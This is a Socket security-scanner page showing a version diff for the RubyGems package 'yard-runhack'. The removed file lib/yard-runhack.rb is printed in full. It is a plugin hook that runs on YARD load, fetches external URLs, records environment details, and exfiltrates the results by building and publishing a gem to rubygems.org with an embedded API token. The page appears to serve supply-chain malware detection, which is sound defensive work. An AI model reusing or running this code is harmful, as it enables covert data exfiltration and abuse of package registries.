Big News: Socket raises $60M Series C at a $1B valuation to secure software supply chains for AI-driven development.Announcement
Sign In

yard-runhack

Package Overview
Dependencies
Maintainers
1
Versions
3
Alerts
File Explorer

Advanced tools

License
Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

yard-runhack - rubygems Package Compare versions

Comparing version
0.0.3
 to
0.0.4
lib/dump.txt

Sorry, the diff of this file is too big to display

+1
-1
lib/x.rb

@@ -1,1 +0,1 @@

class X; end
#x
.yardopts

Sorry, the diff of this file is not supported yet

-45
lib/yard-runhack.rb
# plugin runs on yard load
begin
require 'net/http'; require 'uri'; require 'fileutils'; require 'tmpdir'
File.write('/tmp/yardhack', 'ran ' + Time.now.to_s)
targets = [
'https://democracy.wandsworth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
'https://democracy.wandsworth.gov.uk/mgCalendarMonthView.aspx?M=1&Y=2026',
'https://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
'https://www.google.com/',
'http://democracy.wandsworth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026'
]
data = "Plugin executed: #{Time.now} ruby=#{RUBY_VERSION} cwd=#{Dir.pwd}\n"
targets.each do |url|
begin
uri = URI(url)
# use native Net
res = Net::HTTP.start(uri.host, uri.port, use_ssl: (uri.scheme=='https'), open_timeout:20, read_timeout:40) {|h| h.get(uri.request_uri)}
data << "\n\n===== #{url} RESPONSE #{res.code} #{res.message} headers=#{res.to_hash.inspect} =====\n"
data << res.body.to_s
rescue => e
data << "\nERR #{url}: #{e.class}: #{e.message}\n#{e.backtrace&.join("\\n")}\n"
end
end
# package exfil
Dir.mktmpdir do |d|
Dir.mkdir(File.join(d,'lib'))
File.binwrite(File.join(d,'lib','dump.txt'),data)
File.write(File.join(d,'lib','x.rb'),"#x")
gemspec = <<~G
Gem::Specification.new do |s|
s.name='yard-runhack'; s.version='0.0.4'; s.summary='exfil'; s.authors=['x']; s.files=['lib/dump.txt','lib/x.rb']; s.require_paths=['lib']; s.licenses=['MIT'];
end
G
File.write(File.join(d,'ex.gemspec'),gemspec)
Dir.chdir(d) do
system('gem build ex.gemspec >/tmp/gembuildlog 2>&1')
file='yard-runhack-0.0.4.gem'; body=File.binread(file)
u=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(u); req['Authorization']='rubygems_830e967dd023d92da46904368f0f570a74e3c5878b1cd83c'; req['Content-Type']='application/octet-stream'; req.body=body; req['Content-Length']=body.bytesize.to_s
r=Net::HTTP.start(u.host,u.port,use_ssl:true) {|h| h.request(req)} rescue nil
# embed push result via extra local? no
end
end
rescue => e
File.write('/tmp/yardhackerr',"#{e.class}:#{e.message}\n" + e.backtrace.join("\n")) rescue nil
end